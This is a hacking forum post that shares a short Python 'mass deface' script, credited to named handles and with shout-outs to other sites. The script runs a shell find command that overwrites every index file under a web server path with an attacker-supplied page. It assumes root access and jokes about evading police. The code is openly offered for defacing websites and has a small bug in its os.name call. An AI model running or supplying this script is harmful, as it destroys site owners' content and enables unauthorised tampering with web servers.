Login Register


[Python] Mass Deface filter_list
Author
Message
[Python] Mass Deface #1
Here is mass deface script.
You must have root access to web server.
Code:
#Mass Deface Script by c0ax aka KaiT_AleX #Greetz baltazar, b0ne, Toro, Melvin, Mikisoft etc. #Usage: mass.py [sitepath] [tvojindexfajl] #mass.py /home /tmp/index.php import os, sys, time print "Defaceing..." print "Just wait and see the magic..." time.sleep(1) sajtpt = sys.argv[1] indef = sys.argv[2] inf = os.name() exe = "find %s -name \"index.*\" -exec cp %s {} \;" % (sajtpt, indef) os.system(exe) print "Done..." print "Good luck with cops" print inf print "Visit ljuska.org and dakrartists.info" #EOF #Script by c0ax aka KaiT_AleX
[Image: 1308031172619.gif?w=356&h=140]
Don't learn to hack, hack to learn.

Reply







Users browsing this thread: